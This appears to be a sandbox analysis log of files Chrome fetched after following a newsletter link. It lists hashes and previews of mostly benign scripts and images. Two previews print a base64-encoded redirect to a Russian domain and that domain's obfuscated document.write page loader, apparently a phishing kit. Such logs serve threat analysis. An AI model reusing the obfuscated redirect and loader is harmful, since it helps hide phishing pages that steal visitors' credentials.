                                                                              Preview:wOFF......f........D........................OS/2...X...H...`JM.FVDMX.............^.qcmap.............*.9cvt ...4... ...*....fpgm...T.......Y...gasp...D............glyf...P..U5.......head..]....2...6...Chhea..]........$$...hmtx..]..........ye'loca..^............Gmaxp..`.... ... ./..name..`....8....]..Rpost..f........ .Q.wprep..f$........x...x.c`.Pf......:....Q.B3_dHc..`e.bdb... .`@..`......./9.|...V...)00...-.Wx...S......._..m.m.m.m.m;e..y.~.......<p..a.0t.&...a.pa.0B.1..F...Q.ha.0F.3.....q.xa.0A.0L.&...I.da.0E.2L....i.ta.0C.1..f...Y.la.0G.3.....y.|a..@X0,.....E.ba.DX2,....e.ra..BX1..V...U.ja..FX3.....u.za..A.0l.6...M.fa.E.2l....m.va..C.1..v...].na..G.3......}.~a.p@80......C.a..pD82.....c.q..pB81..N...S.i..pF83.....s.y..pA.0\.....K.e..pE.2\....k.u..pC.1..n...[.m..pG.3......{.}...@x0<.....G.c...Dx2<....g.s...Bx1..^...W.k...Fx3.....w.{...A.0|.>...O.g...E.2|....o.w...C.1..~..._.o..08........?..0$........x...mL.U.............9.x.`[...&BF@X...V.h.Z..h......`n....[..U
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:HTML document, ASCII text, with very long lines (945), with CRLF line terminators
                                                                              Category:downloaded
                                                                              Size (bytes):1497
                                                                              Entropy (8bit):5.346684974022116
                                                                              Encrypted:false
                                                                              SSDEEP:24:hPZCadcpN4mMC/MMFGLnxbFGWdMu1JJSa7oRW7aRWXCunouOvTMOKFId6J397:tZeN4JC/MsGLrGWdRSTw2wptI8Id6j
                                                                              MD5:E55B946715857BF66EBC573698329D03
                                                                              SHA1:A28F666A2EC556BD4CB59E9BD405CEF558368F91
                                                                              SHA-256:41655F04B7006BB8F543AA33A3FA6FE3A6D0654AEADDFD28B056F60EE3C07384
                                                                              SHA-512:56001333443286C8EC8AD5DE7BDB5A3DC815CCDBCA3CD34F08D9867A3B9CC5F7A8E9582B0B28AABED4484EDAE7E2E091B49F762C870B9066EAB2CAD0DA8F0C9B
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              URL:https://3riverscap.sbs/?utm_source=sveinbjrns-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=role-in-personio&_bhlid=194647ae141a6db4016401a3d42ac64bc1afe425
                                                                              Preview:<!DOCTYPE html>..<html lang="en">..<head>.. <meta charset="UTF-8">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <title>Redirecting...</title>.. <script type="text/javascript">.. .. const base64EncodedURL = 'aHR0cHM6Ly83eDcuamFhcXdhbWNvLnJ1L1NiM09FY3Uv';.... // Decode the base64 string and redirect.. window.onload = function() {.. const decodedURL = atob(base64EncodedURL);.. window.location.href = decodedURL;.. };.. </script>..</head>..<body>.. <p>Redirecting, please wait...</p>..<script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8e8c6e58cb1b43b2',t:'MTczMjY1MDg3NC4wMDAwMDA='};var a=document.createElement('script');a.nonce='';a.src='/cdn-cgi/challenge-platform/scripts/jsd/main.js';document.getElementsByTagName('head')[0].appendChild(a);";b.getElementsByTagName('head')[0].appendChild(d)}}if(document.body){var a=document.cr
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:Unicode text, UTF-8 text, with very long lines (64241)
                                                                              Category:downloaded
                                                                              Size (bytes):167730
                                                                              Entropy (8bit):5.045981547409661
                                                                              Encrypted:false
                                                                              SSDEEP:3072:OzCPZkTP3bDLH0tfRqQ0xtLfj4ZDSIpTt813viY8R1j35Ap7LQZLPPJH7PAbOCxW:clZAP+keedJ
                                                                              MD5:AFB5C64B13342F6E568093548D0A2A9F
                                                                              SHA1:95FC121CCCFDBA12443CF87A9C823486065A14AB
                                                                              SHA-256:238DB52476BF8107E2E851CD3299B071ED5944B570C1603A1EA758A4FADF5F29
                                                                              SHA-512:6FE8BADD1B94E81464C0808383A4CC77F779BF226A3C13B58B2BCB36332995EFBC7711373EE8AB2A8BC52675884F9885D168CB2DE9535E39E71B0B72940691E1
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              URL:https://www.microsoft.com/onerfstatics/marketingsites-wcus-prod/west-european/shell/_scrf/css/themes=default.device=uplevel_web_pc/2b-7ae144/7e-3283eb/69-8122fc/86-016699/72-2b1d8c/80-6461e7/2a-d9be59/51-40faf7?ver=2.0
                                                                              Preview:@charset "UTF-8";./*! | Copyright 2017 Microsoft Corporation | This software is based on or incorporates material from the files listed below (collectively, "Third Party Code"). Microsoft is not the original author of the Third Party Code. The original copyright notice and the license under which Microsoft received Third Party Code are set forth below together with the full text of such license. Such notices and license are provided solely for your information. Microsoft, not the third party, licenses this Third Party Code to you under the terms in which you received the Microsoft software or the services, unless Microsoft clearly states that such Microsoft terms do NOT apply for a particular Third Party Code. Unless applicable law gives you more rights, Microsoft reserves all other rights not expressly granted under such agreement(s), whether by implication, estoppel or otherwise.*/./*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css */.body{margin:0}.context-uh
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):48316
                                                                              Entropy (8bit):5.6346993394709
                                                                              Encrypted:false
                                                                              SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                              MD5:2CA03AD87885AB983541092B87ADB299
                                                                              SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                              SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                              SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:ASCII text, with very long lines (8758), with no line terminators
                                                                              Category:downloaded
                                                                              Size (bytes):8758
                                                                              Entropy (8bit):5.718258635876637
                                                                              Encrypted:false
                                                                              SSDEEP:192:vjIVHxE+eME+V8LHSJLfpJtjQYc3YrFJEKjG8EH8rLbnF7bcZP6au:v0VHxneMnVWHApJtkYcs8H8rLbGF6j
                                                                              MD5:392F1341B7A11219173B37A22239D7F5
                                                                              SHA1:C76A9709D999785669FF82F869AEE99B8CAE13E6
                                                                              SHA-256:04BE4AAA6A6C3D535CFCE0577F009C52B2B47AE0DF4C299974C7EF9B60CF020E
                                                                              SHA-512:32380F1942B7F761E0A6F9B26C02004FF22B71652DCA349C1269F81E3EA63BF8005302ABCE76AE74A39E2B00E4CDDC4C03B9A95AF8215BA68652DA5AD8A37E56
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              URL:https://3riverscap.sbs/cdn-cgi/challenge-platform/h/b/scripts/jsd/a6e12e96a2d5/main.js?
                                                                              Preview:window._cf_chl_opt={cFPWv:'b'};~function(X,h,i,n,o,s,z,A,D){X=b,function(c,d,W,e,f){for(W=b,e=c();!![];)try{if(f=parseInt(W(538))/1+parseInt(W(508))/2*(parseInt(W(476))/3)+-parseInt(W(548))/4+parseInt(W(521))/5*(-parseInt(W(496))/6)+parseInt(W(523))/7+parseInt(W(487))/8+parseInt(W(490))/9*(-parseInt(W(503))/10),f===d)break;else e.push(e.shift())}catch(F){e.push(e.shift())}}(a,833100),h=this||self,i=h[X(469)],n=function(a5,d,e,f){return a5=X,d=String[a5(507)],e={'h':function(F){return null==F?'':e.g(F,6,function(G,a6){return a6=b,a6(438)[a6(462)](G)})},'g':function(F,G,H,a7,I,J,K,L,M,N,O,P,Q,R,S,T,U,V){if(a7=a5,null==F)return'';for(J={},K={},L='',M=2,N=3,O=2,P=[],Q=0,R=0,S=0;S<F[a7(506)];S+=1)if(T=F[a7(462)](S),Object[a7(451)][a7(553)][a7(473)](J,T)||(J[T]=N++,K[T]=!0),U=L+T,Object[a7(451)][a7(553)][a7(473)](J,U))L=U;else{if(Object[a7(451)][a7(553)][a7(473)](K,L)){if(256>L[a7(454)](0)){for(I=0;I<O;Q<<=1,G-1==R?(R=0,P[a7(501)](H(Q)),Q=0):R++,I++);for(V=L[a7(454)](0),I=0;8>I;Q=Q<<1|1&V,G-
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:PNG image data, 216 x 46, 8-bit/color RGBA, non-interlaced
                                                                              Category:dropped
                                                                              Size (bytes):4054
                                                                              Entropy (8bit):7.797012573497454
                                                                              Encrypted:false
                                                                              SSDEEP:48:zICvnyRHJ3BRZPcSPQ72N2xoiR4fTJX/rj4sFNMkk5/p1k2lPUmbm39o4aL7V9XH:10nvE724xoiRQJPrjpLKSFl9oX31Z1d
                                                                              MD5:9F14C20150A003D7CE4DE57C298F0FBA
                                                                              SHA1:DAA53CF17CC45878A1B153F3C3BF47DC9669D78F
                                                                              SHA-256:112FEC798B78AA02E102A724B5CB1990C0F909BC1D8B7B1FA256EAB41BBC0960
                                                                              SHA-512:D4F6E49C854E15FE48D6A1F1A03FDA93218AB8FCDB2C443668E7DF478830831ACC2B41DAEFC25ED38FCC8D96C4401377374FED35C36A5017A11E63C8DAE5C487
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:.PNG........IHDR.............J.......tEXtSoftware.Adobe ImageReadyq.e<...(iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c132 79.159284, 2016/04/19-13:13:40 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:A00BC639840A11E68CBEB97C2156C7FD" xmpMM:InstanceID="xmp.iid:A00BC638840A11E68CBEB97C2156C7FD" xmp:CreatorTool="Adobe Photoshop CC 2015.5 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:A2C931A470A111E6AEDFA14578553B7B" stRef:documentID="xmp.did:A2C931A570A111E6AEDFA14578553B7B"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.......DIDATx..\..UU.>.7..3....h.L..& j2...h.@..".........`U.......R"..Dq.&.BJR 1.4`$.200...l........wg.y.[k/
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:HTML document, ASCII text, with very long lines (955), with CRLF line terminators
                                                                              Category:downloaded
                                                                              Size (bytes):193109
                                                                              Entropy (8bit):2.6453396219057264
                                                                              Encrypted:false
                                                                              SSDEEP:768:W7nJSq9GinOo20uqxjr3+AKyKEAPNPPn8P9R/3htzAVT+JcYY5WRItsWc7rQ3S0e:WHGiOoHuOjr3+AKyKAXd
                                                                              MD5:D8EEA5A219A3B99B439EDC17592C0FDC
                                                                              SHA1:756698B92E1C41B38BBDA20485C177D559DAAF00
                                                                              SHA-256:68E06D688F4C1007502CB8B8988B288C03A627445FF14469DBCBF16807235E64
                                                                              SHA-512:27E8583A7282BA612CC16AEBA8772FDAF7EE415A0786051424B380E942FBE7286C05948612691ACE4F736CD4D655CDAC7241A62332FFB8610B36565FDCC28943
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              URL:https://www.microsoft.com/en-us?redir=true
                                                                              Preview:..<!DOCTYPE html><html xmlns:mscom="http://schemas.microsoft.com/CMSvNext".. xmlns:md="http://schemas.microsoft.com/mscom-data" lang="en-us".. xmlns="http://www.w3.org/1999/xhtml"><head><link rel="shortcut icon".. href="//www.microsoft.com/favicon.ico?v2" /><link.. type="text/css" rel="stylesheet".. href="https://assets.onestore.ms/cdnfiles/external/mwf/long/v1/v1.25.0/css/mwf-west-european-default.min.css".. /><title>Your request has been blocked. This could be.. due to several reasons.</title><meta name="Title".. content="We are sorry, the page you requested cannot be.. found" /><meta name="CorrelationVector".. content="VbLZYbRlhU2hyedN.1" /><meta name="Description".. content="" /><meta name="MscomContentLocale".. content="en-us" /><meta name="
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:ASCII text, with very long lines (513), with no line terminators
                                                                              Category:downloaded
                                                                              Size (bytes):513
                                                                              Entropy (8bit):5.350826451115093
                                                                              Encrypted:false
                                                                              SSDEEP:12:D0rdkqmKlO30kMWznLPQspwlZpqBijDgrgLCpWRG3a0:exmwOkkMWIvv4ELsWUp
                                                                              MD5:602C381194795DFC124FACDF48492EF1
                                                                              SHA1:90D594B7B5AF217824F2974514548C95FECFBFA5
                                                                              SHA-256:BF450798FB52E2458A1E10749577E5334F3E1D7907A47FDFEA5430CB71FA19E6
                                                                              SHA-512:8837F6BD2A11387D31A866D07B66A0FF2E58D2EDC2682A582919A1896CE9B4CB683A795D91968B41FA46C31CE62D34414E1F3318D4F5DDA2999447F4BCA6133D
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              URL:https://c.s-microsoft.com/en-us/CMSScripts/script.jsx?k=f65ecb70-094d-0b11-7c9d-7da1bcadfaa7
                                                                              Preview:var jsllConfig={useDefaultContentName:!0,syncMuid:!0,authMethod:AUTHMETHOD,isLoggedIn:ISLOGGEDIN===undefined||ISLOGGEDIN!=="True"?!1:!0,muidDomain:MUIDDOMAIN||"microsoft.com",useShortNameForContentBlob:!1,autoCapture:{pageView:!0,onLoad:!0,onUnload:!0,click:!0,scroll:!0,resize:!0,lineage:!0,jsError:!0,addin:!0,perf:!0},coreData:{appId:JSLLAPPID,market:LOCALE,pageName:PAGENAME,pageType:PAYLOADTYPE,referrerUri:document.referrer,requestUri:window.location.href},callback:{pageName:PAGENAME}};awa.init(jsllConfig)
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:ASCII text, with very long lines (47694)
                                                                              Category:downloaded
                                                                              Size (bytes):47695
                                                                              Entropy (8bit):5.401531363850578
                                                                              Encrypted:false
                                                                              SSDEEP:768:IXCtQmIutwVHbzZBF6gmXLSOzQDjdxdOQbk6sgEvk/7b39tobLKZU8nw81KZLGcD:IGJWHbzZBF6xbGfLsVvy33FU8DW
                                                                              MD5:1685878B80EECB073E51C13F17A5E530
                                                                              SHA1:0FFFA666F98F2D8C1156D46D7F9AB90C5B089AF3
                                                                              SHA-256:C61E2E1347B9ACA3D8F0C9725490470651A1F6C02841FF71F90305EA391CA6D2
                                                                              SHA-512:2B32A82A8E7E0A1F6203A04C3E7DDAE6AC3A4438B2309DC04EA112D862839902DD47D2E4A569BCB6F91E359B1F8197F3A179A206A458881A66E89860F96D526E
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              URL:https://challenges.cloudflare.com/turnstile/v0/b/a6e12e96a2d5/api.js
                                                                              Preview:"use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Ht(u,o,c,g,h,"next",l)}function h(l){Ht(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:HTML document, ASCII text, with very long lines (7365), with CRLF line terminators
                                                                              Category:downloaded
                                                                              Size (bytes):19511
                                                                              Entropy (8bit):5.884203977676526
                                                                              Encrypted:false
                                                                              SSDEEP:384:9nu7CG5Z2LugRicZXnu7CG5Z2LugRic5lrMlrN:DG5Z2icG5Z2iQlrMlrN
                                                                              MD5:026B4ECA558F32BFF5D4002D1A73C758
                                                                              SHA1:2F46571720EB13B9F3E7377A7C1E4A9E9027BB6C
                                                                              SHA-256:F589CF27DE479000CC9CFBD5E721D312E5C2E83AF57C6B1788A6F14E1DD6C849
                                                                              SHA-512:8D7DB8D6A9CCA18F83F7CB824FA2EB22A77CB4B8BB5D4A12EC1CE90652ABD75031963F9A889C3B9A9B13425FF5D38674DC8BDF9FC9899500DC7A2FA0A3965304
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              URL:https://7x7.jaaqwamco.ru/Sb3OEcu/
                                                                              Preview: I find that the harder I work, the more luck I seem to have. -->....<script>../* If you really look closely, most overnight successes took a long time. */..if(atob("aHR0cHM6Ly83eDcuamFhcXdhbWNvLnJ1L1NiM09FY3Uv") == "nomatch"){..document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2NyeXB0by1qcy80LjEuMS9jcnlwdG8tanMubWluLmpzIj48L3NjcmlwdD4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVkZ2UsY2hyb21lPTEiPg0KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPg0KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wIj4NCiAgICA8dGl0bGU+JiM4MjAzOzwvdGl0bGU+
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:ASCII text, with very long lines (65447)
                                                                              Category:dropped
                                                                              Size (bytes):89501
                                                                              Entropy (8bit):5.289893677458563
                                                                              Encrypted:false
                                                                              SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                              MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                              SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                              SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                              SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:very short file (no magic)
                                                                              Category:dropped
                                                                              Size (bytes):1
                                                                              Entropy (8bit):0.0
                                                                              Encrypted:false
                                                                              SSDEEP:3:U:U
                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:1
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:ASCII text, with very long lines (513), with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):513
                                                                              Entropy (8bit):5.350826451115093
                                                                              Encrypted:false
                                                                              SSDEEP:12:D0rdkqmKlO30kMWznLPQspwlZpqBijDgrgLCpWRG3a0:exmwOkkMWIvv4ELsWUp
                                                                              MD5:602C381194795DFC124FACDF48492EF1
                                                                              SHA1:90D594B7B5AF217824F2974514548C95FECFBFA5
                                                                              SHA-256:BF450798FB52E2458A1E10749577E5334F3E1D7907A47FDFEA5430CB71FA19E6
                                                                              SHA-512:8837F6BD2A11387D31A866D07B66A0FF2E58D2EDC2682A582919A1896CE9B4CB683A795D91968B41FA46C31CE62D34414E1F3318D4F5DDA2999447F4BCA6133D
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:var jsllConfig={useDefaultContentName:!0,syncMuid:!0,authMethod:AUTHMETHOD,isLoggedIn:ISLOGGEDIN===undefined||ISLOGGEDIN!=="True"?!1:!0,muidDomain:MUIDDOMAIN||"microsoft.com",useShortNameForContentBlob:!1,autoCapture:{pageView:!0,onLoad:!0,onUnload:!0,click:!0,scroll:!0,resize:!0,lineage:!0,jsError:!0,addin:!0,perf:!0},coreData:{appId:JSLLAPPID,market:LOCALE,pageName:PAGENAME,pageType:PAYLOADTYPE,referrerUri:document.referrer,requestUri:window.location.href},callback:{pageName:PAGENAME}};awa.init(jsllConfig)
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:ASCII text, with very long lines (8775), with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):8775
                                                                              Entropy (8bit):5.738553858338998
                                                                              Encrypted:false
                                                                              SSDEEP:192:ZyFyqB5zBFiFkjCrc8OrZ6XynPSvO1EejJRFSJC8gYSIR:sFyq5FiFkcOF6XyPzbJRAC8gzk
                                                                              MD5:CD295A522E5530BEFEF30FD3FE9475DD
                                                                              SHA1:C8F6C7E366F5870CC4C3CF05BF61DAE28CAC5C50
                                                                              SHA-256:6ED6350404BA966484043335CD8ECFB8B18F7B6E114A08E31A77C77B965D30E7
                                                                              SHA-512:EF87D1D31341CA19F3DD1F25382E2038941E814C876A3330F368773CE6A8937B6230CB2F628BE9E8254F2FC3D55BA28AE112053C5D7B47887B214A22DC8D470D
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:window._cf_chl_opt={cFPWv:'b'};~function(X,h,i,j,k,o,s,B,D){X=b,function(d,e,W,f,g){for(W=b,f=d();!![];)try{if(g=-parseInt(W(402))/1*(parseInt(W(455))/2)+-parseInt(W(450))/3*(parseInt(W(472))/4)+-parseInt(W(480))/5*(parseInt(W(399))/6)+parseInt(W(405))/7+-parseInt(W(395))/8+-parseInt(W(392))/9+parseInt(W(420))/10,e===g)break;else f.push(f.shift())}catch(F){f.push(f.shift())}}(a,849432),h=this||self,i=h[X(401)],j={},j[X(452)]='o',j[X(449)]='s',j[X(432)]='u',j[X(418)]='z',j[X(390)]='n',j[X(465)]='I',j[X(463)]='b',k=j,h[X(397)]=function(g,F,G,H,a2,J,K,L,M,N,O){if(a2=X,null===F||F===void 0)return H;for(J=n(F),g[a2(469)][a2(482)]&&(J=J[a2(483)](g[a2(469)][a2(482)](F))),J=g[a2(446)][a2(471)]&&g[a2(378)]?g[a2(446)][a2(471)](new g[(a2(378))](J)):function(P,a3,Q){for(a3=a2,P[a3(416)](),Q=0;Q<P[a3(451)];P[Q]===P[Q+1]?P[a3(415)](Q+1,1):Q+=1);return P}(J),K='nAsAaAb'.split('A'),K=K[a2(485)][a2(441)](K),L=0;L<J[a2(451)];M=J[L],N=m(g,F,M),K(N)?(O=N==='s'&&!g[a2(409)](F[M]),a2(386)===G+M?I(G+M,N):O||
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:ASCII text, with very long lines (41651)
                                                                              Category:dropped
                                                                              Size (bytes):131537
                                                                              Entropy (8bit):5.2237799798561975
                                                                              Encrypted:false
                                                                              SSDEEP:3072:1f/HuF3CpxEIqQ0/9d1EwgXAnKxnKKviV:1f/HuZ1ILGV
                                                                              MD5:30B7C335C62E5269E2D35B8E8B9F44B4
                                                                              SHA1:C6D92B1516EB8F6D44AAF171FB24A1B2AADD0C4C
                                                                              SHA-256:10733A5D876108F81C5F78EEE5C9760A739D89C52FA6180C4290B7F909F24346
                                                                              SHA-512:5BCE247C84C88F993A857CE2F1E8540C648672DEB6D92A55BC808C33394B784C52866D635BEC8B7CD5E62A7EA4109569AC8BCD1381571B84592ACD6C5901D7A8
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:(function(){/**. * @license almond 0.3.3 Copyright jQuery Foundation and other contributors.. * Released under MIT license, http://github.com/requirejs/almond/LICENSE. */.var requirejs,require,define,__extends;(function(n){function r(n,t){return w.call(n,t)}function s(n,t){var o,s,f,e,h,p,c,b,r,l,w,k,u=t&&t.split("/"),a=i.map,y=a&&a["*"]||{};if(n){for(n=n.split("/"),h=n.length-1,i.nodeIdCompat&&v.test(n[h])&&(n[h]=n[h].replace(v,"")),n[0].charAt(0)==="."&&u&&(k=u.slice(0,u.length-1),n=k.concat(n)),r=0;r<n.length;r++)if(w=n[r],w===".")n.splice(r,1),r-=1;else if(w==="..")if(r===0||r===1&&n[2]===".."||n[r-1]==="..")continue;else r>0&&(n.splice(r-1,2),r-=2);n=n.join("/")}if((u||y)&&a){for(o=n.split("/"),r=o.length;r>0;r-=1){if(s=o.slice(0,r).join("/"),u)for(l=u.length;l>0;l-=1)if(f=a[u.slice(0,l).join("/")],f&&(f=f[s],f)){e=f;p=r;break}if(e)break;!c&&y&&y[s]&&(c=y[s],b=r)}!e&&c&&(e=c,p=b);e&&(o.splice(0,p,e),n=o.join("/"))}return n}function y(t,i){return function(){var r=b.call(arguments,0
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:PNG image data, 19 x 18, 8-bit/color RGB, non-interlaced
                                                                              Category:dropped
                                                                              Size (bytes):61
                                                                              Entropy (8bit):4.068159130770306
                                                                              Encrypted:false
                                                                              SSDEEP:3:yionv//thPlmttnljl//xl/k4E08up:6v/lhPST7Tp
                                                                              MD5:0E0320B915D2C2D7F127390F68A1BC77
                                                                              SHA1:FA3B92AE06494875D3C05375E40FE7856EC9D652
                                                                              SHA-256:D02EA52ABDE6F9A786D36A43FEA9C43827456718FF6D806CFFC529BD894A8B87
                                                                              SHA-512:D6BF3FDA5CCA3CCE60291E627B4DBBCBF60B259279468FF2BE3D2C37ABC8BCDCC51FE27FF2E80BC6D25A82E1C0A50FF06E0E522B50BEF2D1534F9E36F7882A70
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:.PNG........IHDR.............6nr>....IDAT.....$.....IEND.B`.
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                              Category:downloaded
                                                                              Size (bytes):48316
                                                                              Entropy (8bit):5.6346993394709
                                                                              Encrypted:false
